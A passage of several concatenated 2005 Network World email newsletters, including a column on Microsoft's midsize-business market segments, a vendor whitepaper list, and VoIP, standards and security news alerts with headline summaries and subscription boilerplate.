and systems integration partners Cellnet (AMR and SCADA), Cross
Current (public safety and computer-aided dispatch) and Lexis
(wireless parking management systems and equipment).

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
<http://www.networkworld.com/nlwir9743>
2. How to respond to a security breach
<http://www.networkworld.com/nlwir9744>
3. School traps infected PCs in its web
<http://www.networkworld.com/nlwir9375>
4. Cartoon of the Week <http://www.networkworld.com/nlwir9376>

5. CTO: BellSouth lost 9 COs to Katrina
<http://www.networkworld.com/nlwir9745>

_______________________________________________________________
To contact: Joanie Wexler

Joanie Wexler is an independent networking technology
writer/editor in California's Silicon Valley who has spent most
of her career analyzing trends and news in the computer
networking industry. She welcomes your comments on the articles
published in this newsletter, as well as your ideas for future
article topics. Reach her at <mailto:joanie@jwexler.com>.
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117983
_______________________________________________________________
ARCHIVE LINKS

Archive of the Wireless in the Enterprise newsletter:
http://www.networkworld.com/newsletters/wireless/index.html
Wireless research center Latest wireless news, analysis and
resource links http://www.networkworld.com/topics/wireless.html
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

<http://www.networkworld.com/news/2005/101005-grid.html>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

Microsoft focuses on the mid-market

NETWORK WORLD NEWSLETTER: DAVE KEARNS ON WINDOWS NETWORKING TIPS
10/26/05
Today's focus: Microsoft focuses on the mid-market

Dear security.world@gmail.com,

In this issue:

* Microsoft defines a new midsize market
* Links related to Windows Networking Tips
* Featured reader resource
_______________________________________________________________
This newsletter sponsored by Nortel
Building the Mobile Enterprise Online Expo

The workplace is changing rapidly. Employees need to be
untethered from their desks while remaining connected and
accessible. This online event helps you solve your enterprise
mobility challenges by bringing together industry leaders,
including Nortel's CTO and CIO and RIM's VP Enterprise Systems,
to discuss the hottest topics in enterprise mobility. Broadcast
live to your desktop on Nov. 8, 2005. Register today!
http://www.fattail.com/redir/redirect.asp?CID=117982
_______________________________________________________________
MANAGEMENT FRAMEWORKS ARE OUT - BUT WHAT'S IN?

Many vendors stopped using the term "frameworks" when they
became synonymous with endless deployment cycles. So, if
management frameworks are out, what is the alternative? Does a
series of multiple products from multiple vendors work? Will
Configuration Management Database (CMDB) emerge as the new
"framework" or "platform" for the enterprise? Click here for
more:
http://www.fattail.com/redir/redirect.asp?CID=118224
_______________________________________________________________

Today's focus: Microsoft focuses on the mid-market

By Dave Kearns

I poked a little fun at Microsoft last month (see " Microsoft
Centro: Is it right for you?
<http://www.networkworld.com/newsletters/nt/2005/0919nt2.html?rl>
") when I looked at the company's entry into the midsize market
as opposed to the small business/home business and enterprise
markets. In particular, I questioned the definition the company
used: A small business was 25 or fewer PCs, an enterprise was
more than 500 PCs, and everything in between was "midsize."

As it turns out, there's more to the story than was apparent at
that time.

Microsoft has defined a new midsize market, but it hasn't tried
to make it a "one-size fits all" market. A quick visit to the
new Microsoft Midsize Business IT Center
<http://www.networkworld.com/nlwnt9393> shows that, in fact,
Redmond segments the less-than-enterprise-sized market into
three fractions: 25 to 50 PCs, 51 to 250 PCs and 251 to 500 PCs.
You might call those fractions small to midsize, mid- to midsize
and large to midsize. You might. Microsoft didn't, and neither
will I, but you might. Not only does Microsoft differentiate
these three sizes, but it also provides guides and "solutions"
tailored to each level.

For the lower end, this includes:

* Solutions based on Microsoft Small Business Server 2003.
* Security guidelines for small businesses.
* Small IT solution for mobility.

The mid-level program includes:
* Desktop deployment solutions.
* Security and patch management guidance.
* Suggestions for implementing messaging, collaboration and
print services.

Suggestions for the biggest mid-level installations include:
* Security, anti-virus, and back-up and recovery guides.
* Desktop deployment solutions.
* Application-compatibility testing and mitigation guides.

There's also a lot more information organized for everyone who
deals with 500 PCs or fewer, which can be very useful even if
your network is simply a small part of some larger installation.

When Microsoft introduced this mid-market initiative at last
month's Business Summit 2005 conference, CEO Steve Ballmer said:
"The midmarket customer is the least well-served customer across
a spectrum of people involved in IT today. They are challenged
in dealing with complexity and scale, and need to find solutions
that are very appropriate to their needs." It looks like
Microsoft is going to do its best to provide the products and
guidance necessary to help the midmarket IT manager get the job
done.

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
<http://www.networkworld.com/nlwnt9740>
2. How to respond to a security breach
<http://www.networkworld.com/nlwnt9741>
3. School traps infected PCs in its web
<http://www.networkworld.com/nlwnt9373>
4. Cartoon of the Week <http://www.networkworld.com/nlwnt9374>

5. CTO: BellSouth lost 9 COs to Katrina
<http://www.networkworld.com/nlwnt9742>

_______________________________________________________________
To contact: Dave Kearns

Dave Kearns is a writer and consultant in Silicon Valley. He's
written a number of books including the (sadly) now out of print
"Peter Norton's Complete Guide to Networks." His musings can be
found at Virtual Quill <http://www.vquill.com/>.

Kearns is the author of three Network World Newsletters: Windows
Networking Tips, Novell NetWare Tips, and Identity Management.
Comments about these newsletters should be sent to him at these

respective addresses: <mailto:windows@vquill.com>,
<mailto:netware@vquill.com>, <mailto:identity@vquill.com>.

Kearns provides content services to network vendors: books,
manuals, white papers, lectures and seminars, marketing,
technical marketing and support documents. Virtual Quill
provides "words to sell by..." Find out more by e-mail at
<mailto:info@vquill.com>
_______________________________________________________________
This newsletter is sponsored by Intel
Optimizing the Value of Today's Server Hardware Transitions

Infrastructure demands are increasing, and the computing
industry is transitioning to multi-core processors, server
virtualization, and 64-bit computing to support next-generation
workloads. Read Optimizing the Value of Today's Server Hardware
and learn how Intel is integrating a broad set of new server
technologies to support these transitions.
http://www.fattail.com/redir/redirect.asp?CID=118098
_______________________________________________________________
ARCHIVE LINKS

Breaking Windows networking news from Network World, updated
daily: http://www.networkworld.com/topics/windows.html Operating
Systems Research Center:
http://www.networkworld.com/topics/operating-systems.html
Archive of the Windows Networking Tips newsletter:
http://www.networkworld.com/newsletters/nt/index.html
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

<http://www.networkworld.com/news/2005/101005-grid.html>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

Whitepapers Download

NETWORK WORLD NEWSLETTER: WHITEPAPERS DOWNLOAD
10/26/05

Dear security.world@gmail.com,

Today we have 9 feature articles for you from Silver Peak,
Xerox, Cisco Systems, Brocade, Checkpoint, netViz , Permeo,
Cisco Systems, and Opsware.
You can see all of the available whitepapers at:
http://www.networkworld.com/productcentral/whitepapers.html
_______________________________________________________________
Silver Peak
The Impact of Data Center Consolidation on Branch Office
Performance

As enterprises grow in size, and enterprise applications become
more critical to business operations, CIOs are faced with a
design dilemma: should branch office infrastructure be
centralized or distributed? Learn how Silver Peak's Local
Instance Networking ends the debate and get a complementary
research paper from Computerworld titled: "The Impact of Data
Center Consolidation on Branch Office Performance"
http://www.fattail.com/redir/redirect.asp?CID=117912
_______________________________________________________________
Xerox
Smarter Document Management in the Office

Manage documents more effectively, control costs associated with
documents & document processes while using resources more
efficiently with Smarter Document Management. This paper
explores the emphasis for businesses as they try to reduce costs
and improve productivity is not to eliminate paper, but
streamlining how the information embedded in the paper documents
is handled.
http://www.fattail.com/redir/redirect.asp?CID=118080
_______________________________________________________________
Cisco Systems
Cisco Threat Defense System Guide: How to Provide Effective Worm
Mitigation

Worms are among the biggest security challenges to business
productivity today. Protect your networks with an integrated
security solution that is both flexible and pervasive, providing
collaboration between networking and security services, and
comprehensive coverage from your network to your endpoints -
Cisco Threat Defense System.
http://www.fattail.com/redir/redirect.asp?CID=118085
_______________________________________________________________
Brocade
Boost Windows Application Performance for Branch Offices

Learn how to improve remote office wide area network (WAN)
performance, reliability and access to centralized IT resources.
All while reducing the cost of remote office servers and
storage. Download the Guide now and increase your Windows
application performance for remote branch offices.
http://www.fattail.com/redir/redirect.asp?CID=117904
_______________________________________________________________
This newsletter is sponsored by Checkpoint
VoIP Security without the Nightmare

Find out if VoIP will jeopardize your security! Check Point
delivers intelligent VoIP security that keeps your VoIP system
safe without the need to reorganize your entire security policy.
Download a free white paper to learn how Check Point can protect
your VoIP investment.
http://www.fattail.com/redir/redirect.asp?CID=118247
_______________________________________________________________
netViz
Best Practices for IT Documentation

Unlike "static" IT drawing packages, netViz creates live, visual
displays of your business and IT assets. Read more to understand
how netViz will help you leverage visualization software to
reduce costs, ease IT troubleshooting and increase the flow of
information across your whole organization.
http://www.fattail.com/redir/redirect.asp?CID=117417
_______________________________________________________________
Permeo
What Does Secure On Demand Access Really Mean?

Faster. Better. Cheaper. In this whitepaper, analyst Mark
Bouchard, discusses the numerous benefits an on-demand approach
to remote access provides over traditional IPSec alternatives.
You'll learn how to leverage SSL VPN technology to achieve the
most secure remote access with quick implementations, greater
flexibility and reduced operating costs. Download a copy today!

http://www.fattail.com/redir/redirect.asp?CID=117047
_______________________________________________________________
Cisco Systems
The latest trends in the WLAN space toward centralized
intelligence and control

In this new architecture, a WLAN controller system is used to
create and enforce policies across many different lightweight
access points. By centralizing intelligence within these
devices, security, mobility, quality of service (QoS), and other
functions essential to WLAN operations can be efficiently
managed across an entire wireless enterprise.
http://www.fattail.com/redir/redirect.asp?CID=118086
_______________________________________________________________
Opsware
The Shortcut Guide to Automating Network Management and
Compliance

Chapter 1: The Essentials of Automating Network Operations.
Today, companies are faced with increasing network management
and compliance issues. In order to reduce overhead costs yet
maintain flexibility, companies need to automate network
configuration management, security, and compliance tasks. This
guide explores the ways in which a more efficient, more
automated network can lend significant value to the business in
a number of different areas.
http://www.fattail.com/redir/redirect.asp?CID=118422
_______________________________________________________________
Whitepaper index on Network World Fusion:

Akamai
Web Application Performance Directly Impacts Business
http://adserver.fattail.com/redir/redirect.asp?CID=107522

Arbor Networks
Safe Quarantine - Automated Worm Suppression
http://adserver.fattail.com/redir/redirect.asp?CID=103413

Arbor Networks
Best Practices for Simplifying Regulatory Compliance
http://adserver.fattail.com/redir/redirect.asp?CID=107288

Arbor Networks
Ensuring HIPAA Compliance on Internal Networks: Protect Your
Confidential Information
http://adserver.fattail.com/redir/redirect.asp?CID=115552

AT&T
Making the Case for VoIP.
http://adserver.fattail.com/redir/redirect.asp?CID=114382

Aventail
How Aventail SSL VPNs Test Against IPSec
http://adserver.fattail.com/redir/redirect.asp?CID=116698

BMC
Effortless Systems Management
http://adserver.fattail.com/redir/redirect.asp?CID=110902

BMC
Effortless Systems Management
http://adserver.fattail.com/redir/redirect.asp?CID=116040

Brocade
Boost Windows Application Performance for Branch Offices
http://adserver.fattail.com/redir/redirect.asp?CID=117222

Check Point
VoIP Security without the Nightmare
http://adserver.fattail.com/redir/redirect.asp?CID=116791

Ciena
Web Services: What it Will Mean to Your Wide Area Network
http://adserver.fattail.com/redir/redirect.asp?CID=115776

Cisco
The latest trends in the WLAN space toward centralized
intelligence and control
http://adserver.fattail.com/redir/redirect.asp?CID=118225

Cisco Systems
Cisco Threat Defense System Guide: How to Provide Effective Worm
Mitigation
http://adserver.fattail.com/redir/redirect.asp?CID=115636

ConSentry
Indentity-based Networking - Building User and Application
Control into the Network Fabric
http://adserver.fattail.com/redir/redirect.asp?CID=115815

FaceTime
Spyware Prevention: Effective Network Protection Through Defense
in Depth
http://adserver.fattail.com/redir/redirect.asp?CID=114553

HP
Identity Management: An Increasing Requirement in the Regulatory
Compliance Challenge
http://adserver.fattail.com/redir/redirect.asp?CID=117930

HP
IT Consolidation: Business Drivers, Benefits and Vendor
Selection
http://adserver.fattail.com/redir/redirect.asp?CID=118440

iLumin
An IT Investment that Pays Real Dividends: Building ROI with
your Email System
http://adserver.fattail.com/redir/redirect.asp?CID=116697

Intel
Optimizing the Value of Today's Server Hardware Transitions
http://adserver.fattail.com/redir/redirect.asp?CID=118025

Intel
The 64-bit Tipping Point
http://adserver.fattail.com/redir/redirect.asp?CID=118026

Juniper
Implementing Data Center Consolidation While Accelerating
Application Response Time for Remote Users
http://adserver.fattail.com/redir/redirect.asp?CID=116994

Neterion
10 Gb Ethernet or 1 GbE Trunking?
http://adserver.fattail.com/redir/redirect.asp?CID=116039

netViz
Best Practices for IT Documentation
http://adserver.fattail.com/redir/redirect.asp?CID=117332

Opsware
Network Automation: A Fundamental Shift in Network Management
http://adserver.fattail.com/redir/redirect.asp?CID=115925

Opsware
The Shortcut Guide to Automating Network Management and
Compliance
http://adserver.fattail.com/redir/redirect.asp?CID=118241

Permeo
What Does Secure On Demand Access Really Mean?
http://adserver.fattail.com/redir/redirect.asp?CID=115944

Permeo
SSL VPNs and the Lockdown Loophole
http://adserver.fattail.com/redir/redirect.asp?CID=115945

Permeo
SSL VPN Buyer's guide
http://adserver.fattail.com/redir/redirect.asp?CID=115946

ProCurve Networking by HP
Protecting the Extended Enterprise Network: Security Strategies
and Solutions White Paper
http://adserver.fattail.com/redir/redirect.asp?CID=109419

ProCurve Networking by HP
Traffic Management Technical Brief
http://adserver.fattail.com/redir/redirect.asp?CID=117927

ProCurve Networking by HP
ProCurve Secure Router 7000dl series Reviewers Guide
http://adserver.fattail.com/redir/redirect.asp?CID=117928

ProCurve Networking by HP
Virus Throttling Technical Brief
http://adserver.fattail.com/redir/redirect.asp?CID=117929

Silver Peak Systems
The Impact of Data Center Consolidation on Branch Office
Performance
http://adserver.fattail.com/redir/redirect.asp?CID=117395

SSH Communications Security
SSH Communications Security introduces the new SSH Tectia with
G3(TM) technology
http://adserver.fattail.com/redir/redirect.asp?CID=115886

Symantec
Symantec's Antispyware Approach and Solutions: Empowering
Organizations to Regain Control of Their Systems and Networks
http://adserver.fattail.com/redir/redirect.asp?CID=118431

Symantec
Exploring Spyware and Adware Risk Assessment
http://adserver.fattail.com/redir/redirect.asp?CID=118432

Websense
Building a Web Security Ecosystem to Combat Emerging Internet
Threats
http://adserver.fattail.com/redir/redirect.asp?CID=118248

WiredRed
Web & Video Conferencing - The Case for Installed Software
http://adserver.fattail.com/redir/redirect.asp?CID=117761

Xerox
Smarter Document Management in the Office
http://adserver.fattail.com/redir/redirect.asp?CID=115608

Xerox
Optimizing Document Output ROI
http://adserver.fattail.com/redir/redirect.asp?CID=115609

Xerox
The Efficient Office: Business Strategies...
http://adserver.fattail.com/redir/redirect.asp?CID=115610
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

Skype patches critical flaws

All the week's VoIP news and analysis, 10/26/05
_______________________________________________________________
This newsletter is sponsored by Fluke Networks
VoIP: State of the Market on-demand webcast

Fluke Networks and featured presenter Robin Gareiss of Nemertes
Research provide an informative on-demand webcast giving you
vision into the state of the voice over IP (VoIP) market and its
associated challenges, market drivers and recommendations. Watch
the webcast:
http://www.fattail.com/redir/redirect.asp?CID=117909
_______________________________________________________________
MANAGEMENT FRAMEWORKS ARE OUT - BUT WHAT'S IN?

Many vendors stopped using the term "frameworks" when they
became synonymous with endless deployment cycles. So, if
management frameworks are out, what is the alternative? Does a
series of multiple products from multiple vendors work? Will
Configuration Management Database (CMDB) emerge as the new
"framework" or "platform" for the enterprise? Click here for
more:
http://www.fattail.com/redir/redirect.asp?CID=118218
_______________________________________________________________

Network World's VoIP News Alert

Skype patches critical flaws, 10/25/05

Skype users are being urged to upgrade to the latest version of
the popular Internet telephony client, thanks to a number of
critical flaws in the software that were disclosed Tuesday by
Skype's maker, Skype Technologies.
<http://www.networkworld.com/nlvoipalert9680>

Groups challenge FCC's VoIP wiretapping rules, 10/25/05

A group of privacy advocates and technology companies on Tuesday
filed court papers to challenge a ruling by the U.S. Federal
Communications Commission (FCC), saying it overstepped its
authority by requiring VoIP providers to allow wiretapping by
law ...
<http://www.networkworld.com/nlvoipalert9681>

Opinion: Where's Walt Disney when you need him?, 10/24/05

We have a government busy moving pieces around the
telecommunications game board. Where are our national plans for
an EPCOT 2014, our New Songdo City? I guess they're on the
shelf, next to our national alternative energy strategy - in the
TBD section.
<http://www.networkworld.com/nlvoipalert9682>

Aruba simplifies, strengthens remote wireless access, 10/24/05

Aruba Networks is unveiling wireless LAN hardware and software
that are intended to extend corporate security and quality of
service to mobile workers on the road or in remote sites.
<http://www.networkworld.com/nlvoipalert9683>

CommuniGate adds voice features, 10/24/05

CommuniGate Systems last week released the newest version of its
messaging platform designed to provide users with improved voice
support.
<http://www.networkworld.com/nlvoipalert9684>

Managing convergence requires teamwork, 10/24/05

Convergence changes things. Although combining voice and data
across the same packet network wouldn't, in theory, imply
dramatic changes in the organization and operations of an IT
department, in practice companies that implement convergence
find ...
<http://www.networkworld.com/nlvoipalert9685>

VoIP threats defined by alliance, 10/24/05

For all the developments around enterprise VoIP solutions, there
has been only scattered interest in the related potential
security threats but the Voice over IP Security Alliance
(VOIPSA) has shown a spotlight on problems that IT managers
ought to be ...
<http://www.networkworld.com/nlvoipalert9686>

Cisco to combine two-way radio, cellular, VoIP, other
communications into IP backbone, 10/24/05

Cisco this week is expected to announce new technology and a
business unit focused on integrating two-way radio, cellular,
VoIP and other communications methods into an IP backbone.
<http://www.networkworld.com/nlvoipalert9687>

Polycom announces high-definition video support, 10/24/05

Polycom took advantage of its annual Polycom User Group
conference taking place in Phoenix to announce products that
support high-definition videoconferencing, including new
software for its MGC multi-point control unit and an upgrade
package for its ...
<http://www.networkworld.com/nlvoipalert9688>

Opinion: How to survive in IT, 10/24/05

So you have decided on a career in IT instead of, say, being a
dancer on Broadway or becoming a fugu chef in Japan. Given that
you consider IT more interesting than appearing in 50,000
performances of "Oliver" and less risky than serving up ...
<http://www.networkworld.com/nlvoipalert9689>

Opinion: Better phone services for small businesses, 10/24/05

Big-company phone features are now affordable for SMBs
<http://www.networkworld.com/nlvoipalert9690>

Opinion: Apple's unnoticed announcement?, 10/24/05

Apple CEO Steve Jobs made a pile of product announcements on
Oct. 12. The video iPod got most of the press, but it was
another announcement that best indicates Apple's future
directions.
<http://www.networkworld.com/nlvoipalert9691>

Newsletter: Skype and GoRemote collaborate on free calls,
10/19/05

Earlier this month, GoRemote announced a strategic partnership
with Skype whereby GoRemote's customer base of mobile workers
and teleworkers will get free ...
<http://www.networkworld.com/nlvoipalert9692>

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
<http://www.networkworld.com/nlvoipalert9693>
2. How to respond to a security breach
<http://www.networkworld.com/nlvoipalert9694>
3. School traps infected PCs in its web
<http://www.networkworld.com/nlvoipalert9695>
4. Cartoon of the Week
<http://www.networkworld.com/nlvoipalert9696>
5. CTO: BellSouth lost 9 COs to Katrina
<http://www.networkworld.com/nlvoipalert9697>

_______________________________________________________________
To contact:

Senior Editor Phil Hochmuth covers VoIP for Network World.
Reach him at <mailto:phochmuth@nww.com>.

Senior Editor Tim Greene covers VoIP carrier issues for Network
World.
Reach him at <mailto:tgreene@nww.com>
_______________________________________________________________
This newsletter is sponsored by Xerox
Learn About Smarter Document Management in the Office

Need to manage documents more effectively, control costs and use
resources more efficiently? Learn about the benefits and basic
framework needed for implementing Smarter Document Management.
http://www.fattail.com/redir/redirect.asp?CID=118079
_______________________________________________________________
ARCHIVE LINKS

Convergence/VoIP Research Center
http://www.networkworld.com/topics/voip.html
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

<http://www.networkworld.com/news/2005/101005-grid.html>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

Responding to a security breach

All the week's news about network standards, 10/26/05
_______________________________________________________________
This newsletter is sponsored by Sybase
Data Explosion

It sounds so simple: if you collect enough business information,
you'll glean valuable insights that can drive both revenue
growth and competitive advantage. Along the way, however,
companies are discovering that managing the explosive growth of
online data can prove a formidable challenge. Here's how to
assess your data management style, and maximize your
opportunities to turn online data into business opportunity.
Click here for more on taming the data explosion.
http://www.fattail.com/redir/redirect.asp?CID=118158
_______________________________________________________________
GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:
http://www.fattail.com/redir/redirect.asp?CID=118189
_______________________________________________________________

Network World's Standards and Regulations News Alert

Responding to a security breach, 10/24/05

CIOs and network administrators offer tips about how to respond
following a network security breach.
<http://www.networkworld.com/nlstandardsandre9729>

Heated debate brewing over state's OpenDocument plan, 10/25/05

Debate among Massachusetts government officials may throw a
wrench in a state proposal to migrate away from Microsoft's
Office productivity suite in favor of software that supports an
open-document format.
<http://www.networkworld.com/nlstandardsandre9730>

Groups challenge FCC's VoIP wiretapping rules, 10/25/05

A group of privacy advocates and technology companies on Tuesday
filed court papers to challenge a ruling by the U.S. Federal
Communications Commission (FCC), saying it overstepped its
authority by requiring VoIP providers to allow wiretapping by
law enforcement agencies.
<http://www.networkworld.com/nlstandardsandre9731>

IBM leads group to create open-source storage, 10/25/05

IBM and eight other storage vendors are teaming up to form an
open-source organization initially called Aperi, Big Blue
announced Tuesday. The companies intend to work together to
develop common storage software to manage different vendors'
systems, making it easier for users dealing with disparate
storage systems. The software will be made available free of
charge.
<http://www.networkworld.com/nlstandardsandre9732>

Deciphering the world of crypto, 10/24/05

It's the computational magic for scrambling data to keep it
secret, and in the U.S., the best-known cryptographic algorithms
go by names such as Triple-DES and AES. But in other countries,
such as South Korea, Russia and Japan, it is SEED, GOST and ...

<http://www.networkworld.com/nlstandardsandre9733>

VoIP threats defined by alliance, 10/24/05

For all the developments around enterprise VoIP solutions, there
has been only scattered interest in the related potential
security threats but the Voice over IP Security Alliance
(VOIPSA) has shown a spotlight on problems that IT managers
ought to be ...
<http://www.networkworld.com/nlstandardsandre9734>

Opinion: Where's Walt Disney when you need him?, 10/24/05

We have a government busy moving pieces around the
telecommunications game board. Where are our national plans for
an EPCOT 2014, our New Songdo City? I guess they're on the
shelf, next to our national alternative energy strategy - in the
TBD section.
<http://www.networkworld.com/nlstandardsandre9735>

Advisory body calls for stronger authentication in Internet
banking, 10/18/05

A multi-agency federal advisory body with broad regulatory
powers over banks Tuesday issued new guidelines aimed at
improving security in Internet-based banking and financial
services.
<http://www.networkworld.com/nlstandardsandre9736>

The top 5: Today's most-read stories

1. Cisco talking IP-radio nets
<http://www.networkworld.com/nlstandardsandre9645>
2. How to respond to a security breach
<http://www.networkworld.com/nlstandardsandre9646>
3. School traps infected PCs in its web
<http://www.networkworld.com/nlstandardsandre9647>
4. Cartoon of the Week
<http://www.networkworld.com/nlstandardsandre9648>
5. CTO: BellSouth lost 9 COs to Katrina
<http://www.networkworld.com/nlstandardsandre9649>

_______________________________________________________________
To contact:

Contact Online News Editor Jeff Caruso at
<mailto:jcaruso@nww.com>
_______________________________________________________________
This newsletter is sponsored by ProCurve Networking by HP
Network World Executive Guide: Compliance can be an opportunity
for Network Improvements

Federal regulations such as the Health Insurance Portability and
Accountability Act and the Sarbanes-Oxley Act are driving
increased corporate spending on key IT areas such as security,
authentication, access control and document management. Get
advice from experts. Read about real-world tactics. Learn about
the dark side of compliance: what happens when thing wrong.
And, how mandates are affecting IT budgets.
http://www.fattail.com/redir/redirect.asp?CID=118331
_______________________________________________________________
ARCHIVE LINKS

Standards breaking news:
http://www.networkworld.com/topics/standards.html Regulatory
compliance breaking news:
http://www.networkworld.com/topics/compliance.html
_______________________________________________________________
FEATURED READER RESOURCE

GRID TAKING SHAPE IN THE ENTERPRISE

Grid computing continues to gain ground and vendors such as IBM,
Platform Computing, Sun, SAS and Univa are launching services,
products and partnerships to support this growth. But will
challenges such as software licensing, security and bandwidth
issues hinder grid rollouts? Click here for more:

<http://www.networkworld.com/news/2005/101005-grid.html>
_______________________________________________________________
May We Send You a Free Print Subscription?
You've got the technology snapshot of your choice delivered
at your fingertips each day. Now, extend your knowledge by
receiving 51 FREE issues to our print publication. Apply
today at http://www.subscribenw.com/nl2

International subscribers click here:
http://nww1.com/go/circ_promo.html
_______________________________________________________________
SUBSCRIPTION SERVICES

To subscribe or unsubscribe to any Network World e-mail
newsletters, go to:
<http://www.nwwsubscribe.com/Changes.aspx>

To change your e-mail address, go to:
<http://www.nwwsubscribe.com/ChangeMail.aspx>

Subscription questions? Contact Customer Service by replying to
this message.

This message was sent to: security.world@gmail.com
Please use this address when modifying your subscription.
_______________________________________________________________

Have editorial comments? Write Jeff Caruso, Newsletter Editor,
at: <mailto:jcaruso@nww.com>

Inquiries to: NL Customer Service, Network World, Inc., 118
Turnpike Road, Southborough, MA 01772

For advertising information, write Kevin Normandeau, V.P. of
Online Development, at: <mailto:sponsorships@nwfusion.com>

Copyright Network World, Inc., 2005

IBM adds strategy-mapping tool to Workplace

All the week's news and views about Security, 10/26/05
_______________________________________________________________
This newsletter is sponsored by ConSentry Networks
Stop Malware in Milliseconds Not Minutes

Detect and contain malware in milliseconds before it spreads and
takes down your network. ConSentry uses custom algorithms based
on malware behavior, rather than complex baselining or
signatures, to thwart attacks and ensure network availability.
For more information click here
http://www.fattail.com/redir/redirect.asp?CID=117986
_______________________________________________________________
This newsletter is sponsored by Trend Micro

The Trend Micro Threat Map dynamically displays real-time data
to show worldwide trends in virus and content security threats
as they happen. Collected from actual computer infections, the
Threat Map can be used to help determine appropriate security
policies, based on the prevalence of threats that can adversely
affect your business.
http://www.fattail.com/redir/redirect.asp?CID=118081
_______________________________________________________________

Network World's Security News Alert

Skype patches critical flaws, 10/25/05
<http://www.networkworld.com/nlsecuritynewsal9624>
Skype users are being urged to upgrade to the latest version of
the popular Internet telephony client, thanks to a number of
